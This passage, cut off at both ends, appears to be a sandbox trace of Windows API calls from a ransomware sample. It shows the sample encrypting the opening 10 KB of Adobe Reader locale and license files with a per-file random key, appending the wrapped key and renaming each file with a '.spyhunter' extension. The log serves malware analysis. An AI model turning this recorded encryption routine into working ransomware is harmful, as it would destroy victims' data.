dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.765] GetProcessHeap () returned 0x2c0000 [0114.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3e788 | out: hHeap=0x2c0000) returned 1 [0114.767] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9d8 | out: pbBuffer=0x25cf9d8) returned 1 [0114.767] GetProcessHeap () returned 0x2c0000 [0114.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.767] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9d0*=0x30) returned 1 [0114.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0114.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html") returned 74 [0114.767] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.767] GetProcessHeap () returned 0x2c0000 [0114.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.768] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf994*=0x2800, lpOverlapped=0x0) returned 1 [0114.786] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.786] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf994*=0x2800, lpOverlapped=0x0) returned 1 [0114.786] GetProcessHeap () returned 0x2c0000 [0114.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.787] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.787] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x25cf9d4*, lpNumberOfBytesWritten=0x25cf994*=0x4, lpOverlapped=0x0) returned 1 [0114.794] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf994*=0x30, lpOverlapped=0x0) returned 1 [0114.795] CloseHandle (hObject=0xf4) returned 1 [0114.795] GetProcessHeap () returned 0x2c0000 [0114.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.795] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html.spyhunter") returned 84 [0114.795] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\license.html.spyhunter")) returned 1 [0114.796] GetProcessHeap () returned 0x2c0000 [0114.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.797] GetProcessHeap () returned 0x2c0000 [0114.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.797] GetProcessHeap () returned 0x2c0000 [0114.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e367c0 | out: hHeap=0x2c0000) returned 1 [0114.797] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9d8 | out: pbBuffer=0x25cf9d8) returned 1 [0114.797] GetProcessHeap () returned 0x2c0000 [0114.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.797] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9d0*=0x30) returned 1 [0114.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0114.797] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\eula.ini") returned 70 [0114.797] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.797] GetProcessHeap () returned 0x2c0000 [0114.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.798] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf994*=0x4a0, lpOverlapped=0x0) returned 1 [0114.810] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffb60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.810] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf994*=0x4a0, lpOverlapped=0x0) returned 1 [0114.810] GetProcessHeap () returned 0x2c0000 [0114.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.810] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.810] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x25cf9d4*, lpNumberOfBytesWritten=0x25cf994*=0x4, lpOverlapped=0x0) returned 1 [0114.810] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf994, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf994*=0x30, lpOverlapped=0x0) returned 1 [0114.810] CloseHandle (hObject=0xf4) returned 1 [0114.810] GetProcessHeap () returned 0x2c0000 [0114.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.810] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\eula.ini.spyhunter") returned 80 [0114.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\eula.ini.spyhunter")) returned 1 [0114.811] GetProcessHeap () returned 0x2c0000 [0114.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.811] GetProcessHeap () returned 0x2c0000 [0114.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.811] GetProcessHeap () returned 0x2c0000 [0114.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0de60 | out: hHeap=0x2c0000) returned 1 [0114.814] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9d0 | out: pbBuffer=0x25cf9d0) returned 1 [0114.814] GetProcessHeap () returned 0x2c0000 [0114.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.814] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9c8*=0x30) returned 1 [0114.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0114.815] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html") returned 74 [0114.815] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.815] GetProcessHeap () returned 0x2c0000 [0114.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.815] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf98c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf98c*=0x2800, lpOverlapped=0x0) returned 1 [0114.837] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.837] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf98c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf98c*=0x2800, lpOverlapped=0x0) returned 1 [0114.837] GetProcessHeap () returned 0x2c0000 [0114.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.837] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.837] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf98c, lpOverlapped=0x0 | out: lpBuffer=0x25cf9cc*, lpNumberOfBytesWritten=0x25cf98c*=0x4, lpOverlapped=0x0) returned 1 [0114.903] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf98c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf98c*=0x30, lpOverlapped=0x0) returned 1 [0114.903] CloseHandle (hObject=0xf4) returned 1 [0114.903] GetProcessHeap () returned 0x2c0000 [0114.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.903] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html.spyhunter") returned 84 [0114.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\license.html.spyhunter")) returned 1 [0114.966] GetProcessHeap () returned 0x2c0000 [0114.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.966] GetProcessHeap () returned 0x2c0000 [0114.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.966] GetProcessHeap () returned 0x2c0000 [0114.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e36fa0 | out: hHeap=0x2c0000) returned 1 [0114.966] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9c8 | out: pbBuffer=0x25cf9c8) returned 1 [0114.968] GetProcessHeap () returned 0x2c0000 [0114.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9c0*=0x30) returned 1 [0114.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Spelling.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\spelling.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.991] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Spelling.EUQ") returned 77 [0114.991] StrStrW (lpFirst="Spelling.EUQ", lpSrch=".txt") returned 0x0 [0114.991] GetProcessHeap () returned 0x2c0000 [0114.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.991] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf984, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf984*=0x2800, lpOverlapped=0x0) returned 1 [0115.067] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.067] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf984, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf984*=0x2800, lpOverlapped=0x0) returned 1 [0115.526] GetProcessHeap () returned 0x2c0000 [0115.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0115.526] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.526] WriteFile (in: hFile=0x120, lpBuffer=0x25cf9c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf984, lpOverlapped=0x0 | out: lpBuffer=0x25cf9c4*, lpNumberOfBytesWritten=0x25cf984*=0x4, lpOverlapped=0x0) returned 1 [0115.526] WriteFile (in: hFile=0x120, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf984, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf984*=0x30, lpOverlapped=0x0) returned 1 [0115.526] CloseHandle (hObject=0x120) returned 1 [0115.526] GetProcessHeap () returned 0x2c0000 [0115.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0115.527] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Spelling.EUQ.spyhunter") returned 87 [0115.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Spelling.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\spelling.euq"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Spelling.EUQ.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\spelling.euq.spyhunter")) returned 1 [0115.527] GetProcessHeap () returned 0x2c0000 [0115.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0115.527] GetProcessHeap () returned 0x2c0000 [0115.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0115.527] GetProcessHeap () returned 0x2c0000 [0115.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13dc0 | out: hHeap=0x2c0000) returned 1 [0115.528] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9c0 | out: pbBuffer=0x25cf9c0) returned 1 [0115.528] GetProcessHeap () returned 0x2c0000 [0115.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0115.528] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9b8*=0x30) returned 1 [0115.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Weblink.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\weblink.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0115.694] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Weblink.FRA") returned 76 [0115.694] StrStrW (lpFirst="Weblink.FRA", lpSrch=".txt") returned 0x0 [0115.694] GetProcessHeap () returned 0x2c0000 [0115.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0115.694] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf97c*=0x2800, lpOverlapped=0x0) returned 1 [0115.805] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.805] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf97c*=0x2800, lpOverlapped=0x0) returned 1 [0115.805] GetProcessHeap () returned 0x2c0000 [0115.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0115.805] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.805] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x25cf9bc*, lpNumberOfBytesWritten=0x25cf97c*=0x4, lpOverlapped=0x0) returned 1 [0115.805] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf97c*=0x30, lpOverlapped=0x0) returned 1 [0115.805] CloseHandle (hObject=0xf4) returned 1 [0115.945] GetProcessHeap () returned 0x2c0000 [0115.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e5aea8 [0115.945] wnsprintfW (in: pszDest=0x2e5aea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Weblink.FRA.spyhunter") returned 86 [0115.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Weblink.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\weblink.fra"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Weblink.FRA.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\weblink.fra.spyhunter")) returned 1 [0116.592] GetProcessHeap () returned 0x2c0000 [0116.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5aea8 | out: hHeap=0x2c0000) returned 1 [0116.592] GetProcessHeap () returned 0x2c0000 [0116.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0116.593] GetProcessHeap () returned 0x2c0000 [0116.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e150c8 | out: hHeap=0x2c0000) returned 1 [0116.593] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9c0 | out: pbBuffer=0x25cf9c0) returned 1 [0116.593] GetProcessHeap () returned 0x2c0000 [0116.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0116.593] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9b8*=0x30) returned 1 [0116.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SendMail.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\sendmail.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0117.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SendMail.NLD") returned 77 [0117.026] StrStrW (lpFirst="SendMail.NLD", lpSrch=".txt") returned 0x0 [0117.026] GetProcessHeap () returned 0x2c0000 [0117.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.026] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf97c*=0x2800, lpOverlapped=0x0) returned 1 [0117.040] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.041] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf97c*=0x2800, lpOverlapped=0x0) returned 1 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.041] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.041] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x25cf9bc*, lpNumberOfBytesWritten=0x25cf97c*=0x4, lpOverlapped=0x0) returned 1 [0117.041] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf97c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf97c*=0x30, lpOverlapped=0x0) returned 1 [0117.042] CloseHandle (hObject=0xf4) returned 1 [0117.042] GetProcessHeap () returned 0x2c0000 [0117.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.042] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SendMail.NLD.spyhunter") returned 87 [0117.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SendMail.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\sendmail.nld"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SendMail.NLD.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\sendmail.nld.spyhunter")) returned 1 [0117.042] GetProcessHeap () returned 0x2c0000 [0117.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.043] GetProcessHeap () returned 0x2c0000 [0117.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.043] GetProcessHeap () returned 0x2c0000 [0117.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6af08 | out: hHeap=0x2c0000) returned 1 [0117.043] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9b8 | out: pbBuffer=0x25cf9b8) returned 1 [0117.043] GetProcessHeap () returned 0x2c0000 [0117.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.043] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9b0*=0x30) returned 1 [0117.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Spelling.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\spelling.sky"), 